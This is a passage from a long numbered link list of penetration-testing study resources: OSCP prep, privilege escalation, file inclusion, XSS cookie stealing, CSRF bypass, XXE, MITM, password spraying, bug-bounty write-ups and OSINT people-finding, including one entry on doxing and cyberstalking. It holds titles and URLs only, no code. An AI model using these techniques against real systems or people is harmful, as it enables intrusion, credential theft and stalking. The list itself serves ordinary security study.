Sheet: http://red-orbita.com/?p=8455 -1562-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1563-Windows Post-Exploitation Command List : https://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List -1564-Metasploit Cheat Sheet: https://pentesttools.net/metasploit-cheat-sheet/ -1565-Windows Privilege Escalation: https://awansec.com/windows-priv-esc.html -1566-Linux Unix Bsd Post Exploitation: https://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation -1567-Privilege Escalation & Post-Exploitation: https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/ -1568-Metasploit Cheat Sheet: https://vk-intel.org/2016/12/28/metasploit-cheat-sheet/ -1569-Metasploit Cheat Sheet : https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1570-Privilege escalation: Linux: https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1571-Cheat Sheets — Amethyst Security: https://www.ssddcyber.com/cheatsheets -1572-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1573-Cheatsheets: https://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt -1574-Are you ready for OSCP?: https://www.hacktoday.io/t/are-you-ready-for-oscp/59 -1575-Windows Privilege Escalation: https://labs.p64cyber.com/windows-privilege-escalation/ -1576-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1577-Windows Post-Exploitation-Cheat-Sheet: http://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/ -1578-Windows Privilege Escalation (privesc) Resources: https://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/ -1579-Dissecting Mobile Malware: https://slideplayer.com/slide/3434519/ -1580-Android malware analysis with Radare: Dissecting the Triada Trojan: www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/ -1581-Dissecting Mobile Native Code Packers: https://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/ -1582-What is Mobile Malware? Defined, Explained, and Explored: https://www.forcepoint.com/cyber-edu/mobile-malware -1583-Malware Development — Professionalization of an Ancient Art: https://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b -1584-Weaponizing Malware Code Sharing with Cythereal MAGIC: https://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d -1585-Web App Pentest Cheat Sheet: https://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773 -1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued: https://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf -1587-How to Run An External Pentest: https://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a -1588-Advice for new pentesters: https://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea -1589-NodeJS Application Pentest Tips: https://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e -1590-How to combine Pentesting with Automation to improve your security: https://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security -1591-Day 79: FTP Pentest Guide: https://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a -1592-SigintOS: A Wireless Pentest Distro Review: https://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b -1593-Conducting an IoT Pentest : https://medium.com/p/6fa573ac6668?source=user_profile... -1594-Efficient way to pentest Android Chat Applications: https://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f -1595-APT2 - Automated PenTest Toolkit : https://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href -1596-Pentest Tools and Distros: https://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d -1597-Keeping notes during a pentest/security assessment/code review: https://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b -1598-An intro to pentesting an Android phone: https://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39 -1599-The Penetration Testing Report: https://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2 -1600-VA vs Pentest: https://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03 -1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux: https://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f -1602-Pentesting Ethereum dApps: https://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19 -1603-Android pentest lab in a nutshell : https://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3 -1604-Pentest Magazine: Web Scraping with Python : https://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3 -1605-Pentesting iOS apps without jailbreak: https://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e -1606-OSCP/Pen Testing Resources: https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting): https://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc -1608-Local File Inclusion (LFI) — Web Application Penetration Testing: https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601 -1609-Local File Inclusion (Basic): https://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3 -1610-PHP File Inclusion Vulnerability: https://www.immuniweb.com/vulnerability/php-file-inclusion.html -1611-Local File Inclusion: https://teambi0s.gitlab.io/bi0s-wiki/web/lfi/ -1612-Web Application Penetration Testing: Local File Inclusion: https://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/ -1613-From Local File Inclusion to Code Execution : https://resources.infosecinstitute.com/local-file-inclusion-code-execution/ -1614-RFI / LFI: https://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/ -1615-From Local File Inclusion to Remote Code Execution - Part 2: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2 -1616-Local File Inclusion: https://xapax.gitbooks.io/security/content/local_file_inclusion.html -1617-Beginner Guide to File Inclusion Attack (LFI/RFI) : https://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/ -1618-LFI / RFI: https://secf00tprint.github.io/blog/payload-tester/lfirfi/en -1619-LFI and RFI Attacks - All You Need to Know: https://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/ -1620-Log Poisoning - LFI to RCE : http://liberty-shell.com/sec/2018/05/19/poisoning/ -1621-LFI: https://www.slideshare.net/cyber-punk/lfi-63050678 -1622-Hand Guide To Local File Inclusion(LFI): www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html -1623-Local File Inclusion (LFI) - Cheat Sheet: https://ironhackers.es/herramientas/lfi-cheat-sheet/ -1624-Web Application Penetration Testing Local File Inclusion (LFI): https://www.cnblogs.com/Primzahl/p/6258149.html -1625-File Inclusion Vulnerability Prevention: https://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/ -1626-The Most In-depth Hacker's Guide: https://books.google.com/books?isbn=1329727681 -1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking: https://books.google.com/books?id=e6CHDwAAQBAJ -1628-Web App Hacking, Part 11: Local File Inclusion: https://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI -1629-Local and remote file inclusion : https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi -1630-Upgrade from LFI to RCE via PHP Sessions : https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/ -1631-CVV #1: Local File Inclusion: https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a -1632-(PDF) Cross Site Scripting (XSS) in Action: https://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action -1633-XSS exploitation part 1: www.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html -1634-Weaponizing self-xss: https://silentbreaksecurity.com/weaponizing-self-xss/ -1635-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1636-Defense against the Black Arts: https://books.google.com/books?isbn=1439821224 -1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -1638-Bypassing CSRF protection: https://www.bugbountynotes.com/training/tutorial?id=5 -1639-Stealing CSRF tokens with XSS: https://digi.ninja/blog/xss_steal_csrf_token.php -1640-Same Origin Policy and ways to Bypass: https://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12 -1641-Bypassing Same Origin Policy : https://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/ -1642-Client-Side Attack - an overview : https://www.sciencedirect.com/topics/computer-science/client-side-attack -1643-Client-Side Injection Attacks: https://blog.alertlogic.com/blog/client-side-injection-attacks/ -1645-The Client-Side Battle Against JavaScript Attacks Is Already Here: https://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2 -1646-Why Let’s Encrypt is a really, really, really bad idea: https://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801 -1647-Huge Guide to Client-Side Attacks: https://www.notion.so/d382649cfebd4c5da202677b6cad1d40 -1648-OSCP Prep – Episode 11: Client Side Attacks: https://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/ -1649-Client side attack - AV Evasion: https://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack -1650-Client-Side Attack With Metasploit (Part 4): https://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/ -1651-Ransomware: Latest Developments and How to Defend Against Them: https://www.recordedfuture.com/latest-ransomware-attacks/ -1652-Cookie Tracking and Stealing using Cross-Site Scripting: https://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/ -1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords: https://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833 -1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site: https://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d -1655-Steal victim's cookie using Cross Site Scripting (XSS) : https://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/ -1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security: https://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86 -1657-Remote Command Execution: https://hacksland.net/remote-command-execution/ -1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough: https://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2 -1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit): https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/ -1660-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -1661-Exploitation: XML External Entity (XXE) Injection: https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection -1662-Hack The Box: DevOops: https://redteamtutorials.com/2018/11/11/hack-the-box-devoops/ -1663-Web Application Penetration Testing Notes: https://techvomit.net/web-application-penetration-testing-notes/ -1664-WriteUp – Aragog (HackTheBox) : https://ironhackers.es/en/writeups/writeup-aragog-hackthebox/ -1665-Linux Privilege Escalation Using PATH Variable: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/ -1666-Linux Privilege Escalation via Automated Script : https://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/ -1667-Privilege Escalation - Linux : https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html -1668-Linux Privilege Escalation: https://percussiveelbow.github.io/linux-privesc/ -1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit : https://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/ -1670-Linux Privilege Escalation With Kernel Exploit: https://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/ -1671-Reach the root! How to gain privileges in Linux: https://hackmag.com/security/reach-the-root/ -1672-Enumeration for Linux Privilege Escalation: https://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959 -1673-Linux Privilege Escalation Scripts : https://netsec.ws/?p=309 -1674-Understanding Privilege Escalation: www.admin-magazine.com/Articles/Understanding-Privilege-Escalation -1675-Toppo:1 | Vulnhub Walkthrough: https://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d -1676-Privilege Escalation resources: https://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources -1678-OSCP Notes – Privilege Escalation (Linux): https://securism.wordpress.com/oscp-notes-privilege-escalation-linux/ -1679-Udev Exploit Allows Local Privilege Escalation : www.madirish.net/370 -1680-Understanding Linux Privilege Escalation and Defending Against It: https://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it -1681-Windows Privilege Escalation Using PowerShell: https://hacknpentest.com/windows-privilege-escalation-using-powershell/ -1682-Privilege Escalation | Azeria Labs: https://azeria-labs.com/privilege-escalation/ -1683-Abusing SUDO (Linux Privilege Escalation): https://touhidshaikh.com/blog/?p=790 -1684-Privilege Escalation - Linux: https://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html -1685-0day Linux Escalation Privilege Exploit Collection : https://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/ -1686-Linux for Pentester: cp Privilege Escalation : https://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html -1687-Practical Privilege Escalation Using Meterpreter: https://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/ -1688-dirty_sock: Linux Privilege Escalation (via snapd): https://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/ -1689-Linux privilege escalation: https://jok3rsecurity.com/linux-privilege-escalation/ -1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks: https://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/ -1691-How to prepare for PWK/OSCP, a noob-friendly guide: https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob -1692-Basic Linux privilege escalation by kernel exploits: https://greysec.net/showthread.php?tid=1355 -1693-Linux mount without root : epaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root -1694-Linux Privilege Escalation Oscp: www.condadorealty.com/2h442/linux-privilege-escalation-oscp.html -1695-Privilege Escalation Attack Tutorial: https://alhilalgroup.info/photography/privilege-escalation-attack-tutorial -1696-Oscp Bethany Privilege Escalation: https://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation -1697-Hacking a Website and Gaining Root Access using Dirty COW Exploit: https://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/ -1698-Privilege Escalation - Linux · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html -1699-Linux advanced privilege escalation: https://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation -1700-Local Linux privilege escalation overview: https://myexperiments.io/linux-privilege-escalation.html -1701-Windows Privilege Escalation Scripts & Techniques : https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194 -1702-Penetration Testing: Maintaining Access: https://resources.infosecinstitute.com/penetration-testing-maintaining-access/ -1703-Kali Linux Maintaining Access : https://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm -1704-Best Open Source Tools for Maintaining Access & Tunneling: https://n0where.net/maintaining-access -1705-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -1706-Maintaining Access - Ethical hacking and penetration testing: https://miloserdov.org/?cat=143 -1707-Maintaining Access with Web Backdoors [Weevely]: https://www.yeahhub.com/maintaining-access-web-backdoors-weevely/ -1708-Best Open Source MITM Tools: Sniffing & Spoofing: https://n0where.net/mitm-tools -1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained: https://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/ -1710-Man In The Middle Attack (MITM): https://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987 -1711-Real-World Man-in-the-Middle (MITM) Attack : https://ieeexplore.ieee.org/document/8500082 -1712-The Ultimate Guide to Man in the Middle Attacks : https://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/ -1713-How to Conduct ARP Spoofing for MITM Attacks: https://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/ -1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning: https://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633 -1715-Ettercap and middle-attacks tutorial : https://pentestmag.com/ettercap-tutorial-for-windows/ -1716-How To Setup A Man In The Middle Attack Using ARP Poisoning: https://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/ -1717-Intro to Wireshark and Man in the Middle Attacks: https://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d -1718-MiTM Attack with Ettercap: https://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap -1719-Man in the Middle Attack with Websploit Framework: https://www.yeahhub.com/man-middle-attack-websploit-framework/ -1720-SSH MitM Downgrade : https://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade -1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files: https://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/ -1722-Powershell port scanner and banner grabber: https://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/ -1723-What is banner grabbing attack: https://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php -1724-Network penetration testing: https://guif.re/networkpentest -1725-NMAP Cheatsheet: https://redteamtutorials.com/2018/10/14/nmap-cheatsheet/ -1726-How To Scan a Network With Nmap: https://online-it.nu/how-to-scan-a-network-with-nmap/ -1727-Hacking Metasploitable : Scanning and Banner grabbing: https://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/ -1728-Penetration Testing of an FTP Server: https://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b -1729-Nmap Usage & Cheet-Sheet: https://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/ -1730-Discovering SSH Host Keys with NMAP: https://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html -1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation: https://techincidents.com/banner-grabbing-using-nmap-netcat -1732-Nmap – (Vulnerability Discovery): https://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/ -1733-Penetration Testing on MYSQL (Port 3306): https://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/ -1774-Password Spraying - Infosec Resources : https://resources.infosecinstitute.com/password-spraying/ -1775-Password Spraying- Common mistakes and how to avoid them: https://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b -1776-Password Spraying Tutorial: https://attack.stealthbits.com/password-spraying-tutorial-defense -1777-password spraying Archives: https://www.blackhillsinfosec.com/tag/password-spraying/ -1778-The 21 Best Email Finding Tools:: https://beamery.com/blog/find-email-addresses -1779-OSINT Primer: People (Part 2): https://0xpatrik.com/osint-people/ -1780-Discovering Hidden Email Gateways with OSINT Techniques: https://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/ -1781-Top 20 Data Reconnaissance and Intel Gathering Tools : https://securitytrails.com/blog/top-20-intel-tools -1782-101+ OSINT Resources for Investigators [2019]: https://i-sight.com/resources/101-osint-resources-for-investigators/ -1783-Digging Through Someones Past Using OSINT: https://nullsweep.com/digging-through-someones-past-using-osint/ -1784-Gathering Open Source Intelligence: https://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05 -1785-How to Locate the Person Behind an Email Address: https://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/ -1786-Find hacked email addresses and check breach mails: https://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/ -1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password : https://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/ -1788-Top 10 OSINT Tools/Sources for Security Folks: www.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html -1789-Top 5 Open Source OSINT Tools for a Penetration Tester: https://www.breachlock.com/top-5-open-source-osint-tools/ -1790-Open Source Intelligence tools for social media: my own list: https://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/ -1791-Red Teaming: I can see you! Insights from an InfoSec expert : https://www.perspectiverisk.com/i-can-see-you-osint/ -1792-OSINT Playbook for Recruiters: https://amazinghiring.com/osint-playbook/ -1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking: https://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking -1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques): https://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a -1795-Online Investigative Tools for Social Media Discovery and Locating People: https://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html -1796-Expanding Skype Forensics with OSINT: Email Accounts: http://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/ -1798-2019 OSINT Guide: https://www.randhome.io/blog/2019/01/05/2019-osint-guide/ -1799-OSINT - Passive Recon and Discovery of Assets: https://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715 -1800-OSINT With Datasploit: https://dzone.com/articles/osint-with-datasploit -1801-Building an OSINT Reconnaissance Tool from Scratch: https://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b -1802-Find Identifying Information from a Phone Number Using OSINT Tools: https://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/ -1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step): https://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/ -1804-Investigative tools for finding people online and keeping yourself safe: https://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe -1805- Full text of "The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim": https://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt -1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account: https://archive.org/details/texts?and%5B%5D=hacking&sin= -1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!: https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326 -1808-How to Pass OSCP Like Boss: https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d -1809-Deploy a private Burp Collaborator Server in Azure: https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70 -1810-Using Shodan Better Way! :): https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6 -1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty: https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 -1812-How we got LFI in apache Drill (Recon like a boss):: https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d -1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking: https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14 -1814-Week in OSINT #2019–19: https://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4 -1814-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -1815-Week in OSINT #2019–24: https://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f -1816-Page Admin Disclosure | Facebook Bug Bounty 2019: https://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb -1817-XSS in Edmodo within 5 Minute (My First Bug Bounty): https://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d -1818-Collection Of Bug Bounty Tip-Will Be updated daily: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.: https://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6 -1820-How I found a simple bug in Facebook without any Test: https://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2 -1821-Facebook BugBounty — Disclosing page members: https://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520 -1822-Don’t underestimates the Errors They can provide good $$$ Bounty!: https://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596 -1823-Django and Web Security Headers: https://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e -1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads: https://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800 -1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program: https://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9 -1826-XSS in Microsoft subdomain: https://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631 -1827-How Angular Protects Us From XSS Attacks?: https://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95 -1828-[FUN] Bypass XSS Detection WAF: https://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e -1829-Bug Hunting Methodology(Part-2): https://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150 -1830-Learn Web Application Penetration Testing: https://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361 -1831-“Exploiting a Single Parameter”: https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523 -1832-CORS To CSRF Attack: https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441 -1833-Account Takeover Using CSRF(json-based): https://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc -1834-Bypassing Anti-CSRF with Burp Suite Session Handling: https://bestestredteam.com/tag/anti-csrf/ -1835-10 Methods to Bypass Cross Site Request Forgery (CSRF): https://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/ -1836-Exploiting CSRF on JSON endpoints with Flash and redirects: https://medium.com/p/681d4ad6b31b -1837-Finding and exploiting Cross-site request forgery (CSRF): https://securityonline.info/finding-exploiting-cross-site-request-forgery/ -1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration: https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf -1839-Synchronizer Token Pattern: No more tricks: https://medium.com/p/d2af836ccf71 -1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service: https://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1 -1841-XML External Entity(XXE): https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b -1842-XXE Attacks— Part 1: XML Basics: https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26 -1843-From XXE to RCE with PHP/expect — The Missing Link: https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 -1844-My first XML External Entity (XXE) attack with .gpx file: https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98 -1845-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496 -1846-XXE on Windows system …then what ??: https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745 -1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 -1848-SVG XLink SSRF fingerprinting libraries version: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c -1849-What is XML Injection Attack: https://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6 -1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 -1851-Penetration Testing Introduction: Scanning & Reconnaissance: https://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f -1852-Beginner’s Guide to recon automation.: https://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -1853-Red Teamer’s Guide to Pulse Secure SSL VPN: https://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b -1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection: https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 -1855-How I harvested Facebook credentials via free wifi?: https://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049 -1856-How to hack any Payment Gateway?: 